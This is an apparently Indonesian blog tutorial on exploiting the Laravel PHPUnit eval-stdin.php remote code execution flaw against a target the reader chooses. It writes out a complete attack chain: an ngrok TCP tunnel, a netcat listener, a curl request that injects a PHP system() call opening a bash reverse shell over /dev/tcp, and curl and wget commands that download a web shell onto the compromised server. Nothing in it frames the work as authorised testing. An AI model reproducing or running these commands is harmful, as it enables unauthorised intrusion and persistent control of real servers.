LARAVEL PHPUNIT RCE TO REVERSE SHELL WITH NGROK
Pastikan teman-teman sudah menginstal Netcat dan Ngrok, dan jangan lupa untuk menyiapkan target yang menurut teman-teman Vuln.
Jika sudah mendapatkan target yg menurut teman-teman Vuln buka Terminal kesukaan teman-teman kalow saya di PC menggunakan WSL teman-teman juga bisa menggunakan TERMUX di HP (android) kalian.
Jalankan Ngroknya dengan mengetikan command dibawah ini.
Command:
./ngrok tcp [port kalian]Example:
./ngrok tcp 1337kemudian tekan enter, jika Ngrok berjalan dengan lancar akan ada tulisan online yang berwarna hijau. Lihat gambar dibawah ini.
Buka tab Terminal baru dan jalankan netcatnya dengan mengetikan command dibawah ini.
Command:
nc -lnvp [port ngrok tadi]Example:
nc -lnvp 1337kemudian tekan enter, jika Netcat berjalan dengan lancar akan ada tulisan Listening on blablabla. Lihat gambar dibawah ini.
Buka tab Terminal baru lagi dan kita akan mengexploit target yg teman-teman sudah siapkan, kemudian ketikan command RCE dibawah ini.
Command:
curl -d "<?php system('bash -i >& /dev/tcp/[host]/[port] 0>&1');?>" [target kalian]/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Example:curl -d "<?php system('bash -i >& /dev/tcp/0.tcp.ngrok.io/18568 0>&1');?>" http://evilsite,com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
kemudian tekan enter, dan lihat tab Netcat jika ada tulisan bash: no job control in this shell berarti teman-teman telah success reverse shell.
example curl:
curl -o namafile.php [url shell]example wget:
wget -O namafile.php [url shell]Baik teman-teman sekian dulu tutorial dari saya semoga bermanfaat.
Posting Komentar
Harap berkomentar dengan sopan, dan jelas :)